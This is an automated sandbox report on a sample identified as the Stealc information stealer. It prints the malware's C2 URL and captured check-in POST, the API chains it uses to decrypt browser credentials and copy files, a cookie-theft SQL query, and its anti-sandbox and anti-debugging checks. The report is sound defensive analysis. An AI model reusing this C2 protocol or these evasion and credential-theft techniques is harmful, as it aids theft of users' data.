
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542963
MD5: 083803a310e16df3e21777d07a5be88a
SHA1: 1a0a8d22d1e39395c4f98a5188ee91384ec54d6f
SHA256: 4f3a31155f05af798afc16c664a7e4b364b9cd7f78d2c40f92ca25b1f9dc115b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 083803A310E16DF3E21777D07A5BE88A)
  • cleanup
Malware family (Name / Description / Attribution / Blogpost URLs / Link)

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches, PCAP (Source | Rule | Description | Author | Strings)
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Yara matches, memory dumps (Source | Rule | Description | Author | Strings)
00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 420 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 420 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Yara matches, unpacked PE files (Source | Rule | Description | Author | Strings)
0.2.file.exe.d0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Sigma: No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-10-27T01:22:05.157295+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 57121 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.d0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000D7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000D9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000D9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:57121 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBG
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 42 36 41 35 32 35 32 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 2d 2d 0d 0a
    Data Ascii (CRLF-separated in the capture):
        ------JJKFBFIJJECGCAAAFCBG
        Content-Disposition: form-data; name="hwid"
        01FB6A525235574217965
        ------JJKFBFIJJECGCAAAFCBG
        Content-Disposition: form-data; name="build"
        puma
        ------JJKFBFIJJECGCAAAFCBG--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000D4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers, Data Raw and Data Ascii as the global traffic POST entry above)
Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/&u
Source: file.exe, 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php3u
Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpk
Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpt
Source: file.exe, 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045608E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A60AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049D967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AB1D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004791B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EC2CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004ACB69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A4BC2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049F40E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FB466
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036A48B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A35BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A165F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AE631
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 000D45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ybzlaxoh ZLIB complexity 0.9951239753324267
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\J0W1NQ2T.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;i
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1850368 > 1048576
Source: file.exe | Static PE information: Raw size of ybzlaxoh is bigger than: 0x100000 < 0x19da00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ybzlaxoh:EW;gchetgti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ybzlaxoh:EW;gchetgti:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cfa3c should be: 0x1d31a3
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: ybzlaxoh
Source: file.exe | Static PE information: section name: gchetgti
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BC053 push 58A12E30h; mov dword ptr [esp], esi | 0_2_004BC099
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BC053 push edx; mov dword ptr [esp], esi | 0_2_004BC147
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BC053 push ebp; mov dword ptr [esp], esi | 0_2_004BC153
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057F872 push eax; mov dword ptr [esp], esi | 0_2_0057F88D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057F872 push ecx; mov dword ptr [esp], esp | 0_2_0057F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058787D push ebx; mov dword ptr [esp], esi | 0_2_005878EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000EB035 push ecx; ret | 0_2_000EB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 74E08F72h; mov dword ptr [esp], ebp | 0_2_004A3880
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 28287C9Fh; mov dword ptr [esp], esp | 0_2_004A3888
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 2A1488FBh; mov dword ptr [esp], ebx | 0_2_004A39A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push eax; mov dword ptr [esp], 2FD53D49h | 0_2_004A39A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push edi; mov dword ptr [esp], eax | 0_2_004A39AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push eax; mov dword ptr [esp], edi | 0_2_004A39D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 08ED1F5Dh; mov dword ptr [esp], ebx | 0_2_004A3A00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push edi; mov dword ptr [esp], ecx | 0_2_004A3A04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push ebp; mov dword ptr [esp], esi | 0_2_004A3A98
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push esi; mov dword ptr [esp], eax | 0_2_004A3AC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push eax; mov dword ptr [esp], ebx | 0_2_004A3BDB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 50B71DD4h; mov dword ptr [esp], edx | 0_2_004A3C0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push edx; mov dword ptr [esp], 610B2623h | 0_2_004A3C95
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 5F43B6DEh; mov dword ptr [esp], eax | 0_2_004A3CD4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push ebx; mov dword ptr [esp], 359347DDh | 0_2_004A3CDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push esi; mov dword ptr [esp], ebp | 0_2_004A3D0A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 7440EC22h; mov dword ptr [esp], esi | 0_2_004A3D61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 6A2CF7C7h; mov dword ptr [esp], ebx | 0_2_004A3DAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A3804 push 5353A446h; mov dword ptr [esp], ecx | 0_2_004A3DD8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D5815 push esi; mov dword ptr [esp], ebx | 0_2_004D585A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053C8D5 push edx; mov dword ptr [esp], ebx | 0_2_0053C940
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005028CC push ebp; mov dword ptr [esp], 3FFE2E7Eh | 0_2_005028F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B58EC push ebx; mov dword ptr [esp], edi | 0_2_005B5967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053E094 push 2C65E36Bh; mov dword ptr [esp], ebp | 0_2_0053E047
Source: file.exe | Static PE information: section name: ybzlaxoh entropy: 7.954973653078467

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13609
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AC6B0 second address: 4AC6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B25F9 second address: 4B2601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B2601 second address: 4B2621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F95D47CFB2Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B2621 second address: 4B2625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B2747 second address: 4B275A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F95D47CFB2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B53A3 second address: 4B53F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007F95D5269628h 0x00000010 jp 00007F95D5269628h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jg 00007F95D5269645h 0x00000021 mov eax, dword ptr [eax] 0x00000023 jng 00007F95D526962Eh 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B53F2 second address: 4B5404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B5404 second address: 4B5408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B5408 second address: 4B5489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [ebp+122D3291h], ecx 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F95D47CFB28h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D184Ah], ebx 0x00000030 push 00000000h 0x00000032 push 00000003h 0x00000034 pushad 0x00000035 mov edx, dword ptr [ebp+122D2C14h] 0x0000003b mov esi, 476C8DFCh 0x00000040 popad 0x00000041 call 00007F95D47CFB29h 0x00000046 pushad 0x00000047 jmp 00007F95D47CFB38h 0x0000004c push ebx 0x0000004d jo 00007F95D47CFB26h 0x00000053 pop ebx 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 push esi 0x00000058 push edx 0x00000059 pop edx 0x0000005a pop esi 0x0000005b pop edx 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B5489 second address: 4B54AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F95D526962Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B573A second address: 4B5747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F95D47CFB26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B5747 second address: 4B5789 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F95D5269634h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jl 00007F95D5269633h 0x0000001b jmp 00007F95D526962Dh 0x00000020 mov eax, dword ptr [eax] 0x00000022 jo 00007F95D526962Eh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B5789 second address: 4B57F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F95D47CFB34h 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2848h], edx 0x00000015 push 00000003h 0x00000017 xor dword ptr [ebp+122D184Ah], esi 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D19FAh], ecx 0x00000025 push 00000003h 0x00000027 mov ecx, 37AE1749h 0x0000002c call 00007F95D47CFB29h 0x00000031 jns 00007F95D47CFB34h 0x00000037 push eax 0x00000038 jne 00007F95D47CFB2Eh 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 push edi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
